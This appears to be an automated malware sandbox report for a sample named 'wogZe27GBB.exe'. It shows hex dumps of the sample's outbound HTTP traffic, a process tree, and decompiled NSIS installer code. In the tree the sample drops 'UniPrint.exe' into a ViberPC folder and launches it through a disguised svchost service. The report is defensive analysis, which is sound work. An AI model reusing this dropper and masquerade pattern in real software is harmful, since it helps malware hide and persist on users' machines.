                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:34 UTC765OUTData Raw: c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c 11 d8 22 e7 38 c7 04 f7 aa b6 ca fa 84 76 92 5c 2e 98 f1 de 19 ad d3 ec f6 c2 37 8e 52 80 a8 38 45 07 07 6e 08 cf 53 cd 47 b5 56 b9 5e cd dc e7 d5 99 18 32 92 ac 39 04 1e 45 4d 77 7b 75 7c c8 d7 97 12 4e d1 ae c5 69 1b 71 0b 9c e3 27 eb 5d 02 d9 5a c7 6f 6d 37 d9 e2 27 4d 85 cd e0 65 07 7b 98 c4 88 1b d7 e7 62 bf 85 53 b8 89 13 c3 8b aa 0b 44 13 ce 89 03 2e c5 da 8b 92 3c d0 3b 16 db b7 38 ea 18 e7 91 4f da 2b d8 14 19 89 45 74 17 90 5b ae af e2 65 58 21 11 c1 13 18 80 41 84 3e 6a 01 b7 d3 82 47 1e
                                                                                                      Data Ascii: uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),"8v\.7R8EnSGV^29EMw{u|Niq']Zom7'Me{bSD.<;8O+Et[eX!A>jG
                                                                                                      2021-09-15 11:45:34 UTC781OUTData Raw: 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 32 5b bb e8 02 3c f6 96 c2 36 91 10 94 b8 62 46 e6 0b 9c 14 19 eb eb 4f 91 ff 00 4d 0b 9d 7f 49 97 e8 a2 8a 82 c2 bc af e2 c7 fc 86 6c bf eb 81 fe 75 ea 95 e5 7f 16 3f e4 33 65 ff 00 5c 0f f3 ad 69 6e cc ea ec 8e 14 53 85 34 52 d6 e8 c5 8e a2 92 96 99 21 45 14 53 00 a5 a4 a2 80 16 8a 4a 28 01 68 a4 a5 a0 02 8a 28 a0 41 45 14 50 01 4b 49 45 30 16 8a 4a 5a 00 5a 29 28 a0 2c 2d 14 94 b4 00 51 45 14 c4 2d 14 94 50 02 d2 d2 52 d3 42 16 8a 4a 5a 62 0c d1 9a 4a 5c 8a 2e 02 d1 49 9a 33 45 c2 c2 d1 9a 4a 05 01 61 73 45 14 50 01 45 14 50 21 68 a4 a2 98 0b 4b 9a 6d 14 5c 2c 3b 34 b9 a6 52 d0 16 1d 4b 4d a5 a6 21 68 a2 8a 62 16 8a 4a 28 01 68
                                                                                                      Data Ascii: o7G7M:.QTO}-?)2[<6bFOMIlu?3e\inS4R!ESJ(h(AEPKIE0JZZ)(,-QE-PRBJZbJ\.I3EJasEPEP!hKm\,;4RKM!hbJ(h
                                                                                                      2021-09-15 11:45:34 UTC796OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 30 33 30 32 36 37 31 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3803026718--
                                                                                                      2021-09-15 11:45:35 UTC796INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:34 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=293b9a65d5663fc7d1794afa48d5df4aca76c53fc72b066efee8d86d69ec8603; expires=Thu, 15-Sep-2022 11:45:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:35 UTC796INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: wogZe27GBB.exe PID: 6416 Parent PID: 1404

                                                                                                      General

                                                                                                      Start time:13:44:48
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\wogZe27GBB.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1773472 bytes
                                                                                                      MD5 hash:5EFC68ABD7FEC415E34980D95A06A66A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6480 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:44:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: UniPrint.exe PID: 6532 Parent PID: 6416

                                                                                                      General

                                                                                                      Start time:13:44:55
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6644 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:02
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: UniPrint.exe PID: 6736 Parent PID: 4940

                                                                                                      General

                                                                                                      Start time:13:45:08
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6992 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:13
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 7052 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:14
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 7064 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:14
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 7104 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:15
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 4884 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:17
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 4600 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:19
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: SgrmBroker.exe PID: 3888 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:19
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                      Imagebase:0x7ff770ce0000
                                                                                                      File size:163336 bytes
                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 3864 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:20
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
                                                                                                      Imagebase:0x1220000
                                                                                                      File size:44520 bytes
                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 3348 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:20
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6316 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:28
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: UniPrint.exe PID: 6252 Parent PID: 3388

                                                                                                      General

                                                                                                      Start time:13:45:32
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: UniPrint.exe PID: 4912 Parent PID: 4940

                                                                                                      General

                                                                                                      Start time:13:45:39
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: UniPrint.exe PID: 6524 Parent PID: 3388

                                                                                                      General

                                                                                                      Start time:13:45:41
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: UniPrint.exe PID: 4420 Parent PID: 4940

                                                                                                      General

                                                                                                      Start time:13:45:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: MpCmdRun.exe PID: 6028 Parent PID: 3348

                                                                                                      General

                                                                                                      Start time:13:46:21
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                      Imagebase:0x7ff7dafe0000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6032 Parent PID: 6028

                                                                                                      General

                                                                                                      Start time:13:46:22
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: wogZe27GBB.exe PID: 6416 Parent PID: 1404 wogZe27GBB.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 0040323C, Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 74%
                                                                                                        			_entry_() {
				struct _SHFILEINFO _v360;
				char _v372;
				struct _SECURITY_ATTRIBUTES* _v376;
				int _v380;
				CHAR* _v384;
				CHAR* _v388;
				int _v392;
				intOrPtr _v396;
				struct _SECURITY_ATTRIBUTES* _v404;
				struct _SECURITY_ATTRIBUTES* _v412;
				void* _v428;
				intOrPtr _t36;
				CHAR* _t41;
				char* _t44;
				signed int _t46;
				void* _t50;
				int _t52;
				signed int _t54;
				signed int _t57;
				int _t58;
				signed int _t62;
				void* _t80;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				 *0x407030();
				SetErrorMode(0x8001); // executed
				_t36 =  *0x40727c(0); // executed
				 *0x423f58 = _t36;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfo(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t41 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\wogZe27GBB.exe\" ";
				E00405B66(_t96, _t41);
				 *0x423ea0 = GetModuleHandleA(0);
				_t44 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\wogZe27GBB.exe\" " == 0x22) {
					_v384 = 0x22;
					_t44 =  &M00429001;
				}
				_t46 = CharNextA(E00405684(_t44, _v384));
				_v384 = _t46;
				while(1) {
					_t91 =  *_t46;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t46 - 0x22;
						_v384 = 0x20;
						if( *_t46 == 0x22) {
							_t46 = _t46 + 1;
							__eflags = _t46;
							_v384 = 0x22;
						}
						__eflags =  *_t46 - 0x2f;
						if( *_t46 != 0x2f) {
							L15:
							_t46 = E00405684(_t46, _v384);
							__eflags =  *_t46 - 0x22;
							if(__eflags == 0) {
								_t46 = _t46 + 1;
								__eflags = _t46;
							}
							continue;
						} else {
							_t46 = _t46 + 1;
							__eflags =  *_t46 - 0x53;
							if( *_t46 == 0x53) {
								__eflags = ( *(_t46 + 1) | 0x00000020) - 0x20;
								if(( *(_t46 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t46 - 0x4352434e;
							if( *_t46 == 0x4352434e) {
								__eflags = ( *(_t46 + 4) | 0x00000020) - 0x20;
								if(( *(_t46 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t46 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t46 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t46 - 2)) = 0;
								__eflags = _t46 + 2;
								E00405B66("C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons", _t46 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t50 = E00403208(_t109);
								_t110 = _t50;
								if(_t50 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t52 = E00402C72(_t111, _t99); // executed
									_v392 = _t52;
									if(_t52 != 0) {
										L32:
										ExitProcess(); // executed
										 *0x407280(); // executed
										if(_v384 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t57 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t57;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t62 =  *_t106(GetCurrentProcess(), 0x28,  &_v372);
															__eflags = _t62;
															if(_t62 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v376);
																_v392 = 1;
																_v380 = 2;
																 *_t97(_v396, 0,  &_v392, 0, 0, 0);
															}
														}
													}
												}
												_t58 = ExitWindowsEx(2, 0);
												__eflags = _t58;
												if(_t58 == 0) {
													E0040140B(9);
												}
											}
											_t54 =  *0x423f4c;
											__eflags = _t54 - 0xffffffff;
											if(_t54 != 0xffffffff) {
												_v376 = _t54;
											}
											ExitProcess(_v376);
										}
										E00405427(_v384, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v380 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v388 = "Error launching installer";
									if(_t103 < _t96) {
										_push("~nsu.tmp");
										_push(_t105);
										L00405B82();
										_push("C:\\Users\\hardz\\Desktop");
										_push(_t105);
										if( *0x4070f0() == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons", "C:\\Users\\hardz\\Desktop");
										}
										E00405B66(0x424000, _v392);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v412 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\wogZe27GBB.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t80 = E004053C6(0x41f058);
												if(_t80 != 0) {
													CloseHandle(_t80);
													_v412 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons", _t104);
									E00405B66("C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons", _t104);
									_v404 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								_push("\\Temp");
								_push(_t105);
								L00405B82();
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t46 = _t46 + 1;
						__eflags =  *_t46 - 0x20;
					} while ( *_t46 == 0x20);
					goto L5;
				}
				goto L20;
			}




































                                                                                                        0x00403248
                                                                                                        0x0040324c
                                                                                                        0x00403254
                                                                                                        0x00403256
                                                                                                        0x0040325b
                                                                                                        0x00403266
                                                                                                        0x0040326d
                                                                                                        0x00403275
                                                                                                        0x0040327f
                                                                                                        0x00403295
                                                                                                        0x004032a5
                                                                                                        0x004032aa
                                                                                                        0x004032b0
                                                                                                        0x004032b7
                                                                                                        0x004032ca
                                                                                                        0x004032cf
                                                                                                        0x004032d1
                                                                                                        0x004032d3
                                                                                                        0x004032d8
                                                                                                        0x004032d8
                                                                                                        0x004032e8
                                                                                                        0x004032ee
                                                                                                        0x00403357
                                                                                                        0x00403357
                                                                                                        0x00403359
                                                                                                        0x0040335b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004032f4
                                                                                                        0x004032f7
                                                                                                        0x004032ff
                                                                                                        0x004032ff
                                                                                                        0x00403302
                                                                                                        0x00403307
                                                                                                        0x00403309
                                                                                                        0x00403309
                                                                                                        0x0040330a
                                                                                                        0x0040330a
                                                                                                        0x0040330f
                                                                                                        0x00403312
                                                                                                        0x00403347
                                                                                                        0x0040334c
                                                                                                        0x00403351
                                                                                                        0x00403354
                                                                                                        0x00403356
                                                                                                        0x00403356
                                                                                                        0x00403356
                                                                                                        0x00000000
                                                                                                        0x00403314
                                                                                                        0x00403314
                                                                                                        0x00403315
                                                                                                        0x00403318
                                                                                                        0x00403320
                                                                                                        0x00403323
                                                                                                        0x00403325
                                                                                                        0x00403325
                                                                                                        0x00403325
                                                                                                        0x00403323
                                                                                                        0x00403328
                                                                                                        0x0040332e
                                                                                                        0x00403336
                                                                                                        0x00403339
                                                                                                        0x0040333b
                                                                                                        0x0040333b
                                                                                                        0x0040333b
                                                                                                        0x00403339
                                                                                                        0x0040333e
                                                                                                        0x00403345
                                                                                                        0x0040335f
                                                                                                        0x00403362
                                                                                                        0x0040336b
                                                                                                        0x00403370
                                                                                                        0x00403370
                                                                                                        0x0040337b
                                                                                                        0x00403381
                                                                                                        0x00403386
                                                                                                        0x00403388
                                                                                                        0x004033aa
                                                                                                        0x004033af
                                                                                                        0x004033b6
                                                                                                        0x004033bd
                                                                                                        0x004033c1
                                                                                                        0x00403428
                                                                                                        0x00403428
                                                                                                        0x0040342d
                                                                                                        0x00403437
                                                                                                        0x00403522
                                                                                                        0x00403528
                                                                                                        0x00403533
                                                                                                        0x0040353c
                                                                                                        0x0040353e
                                                                                                        0x00403543
                                                                                                        0x00403545
                                                                                                        0x00403547
                                                                                                        0x00403549
                                                                                                        0x0040354b
                                                                                                        0x0040354d
                                                                                                        0x0040354f
                                                                                                        0x0040355f
                                                                                                        0x00403561
                                                                                                        0x00403563
                                                                                                        0x00403570
                                                                                                        0x0040357f
                                                                                                        0x00403587
                                                                                                        0x0040358f
                                                                                                        0x0040358f
                                                                                                        0x00403563
                                                                                                        0x0040354f
                                                                                                        0x0040354b
                                                                                                        0x00403594
                                                                                                        0x0040359a
                                                                                                        0x0040359c
                                                                                                        0x004035a0
                                                                                                        0x004035a0
                                                                                                        0x0040359c
                                                                                                        0x004035a5
                                                                                                        0x004035aa
                                                                                                        0x004035ad
                                                                                                        0x004035af
                                                                                                        0x004035af
                                                                                                        0x004035b7
                                                                                                        0x004035b7
                                                                                                        0x00403446
                                                                                                        0x0040344d
                                                                                                        0x0040344d
                                                                                                        0x004033c9
                                                                                                        0x00403418
                                                                                                        0x00403418
                                                                                                        0x00403424
                                                                                                        0x00000000
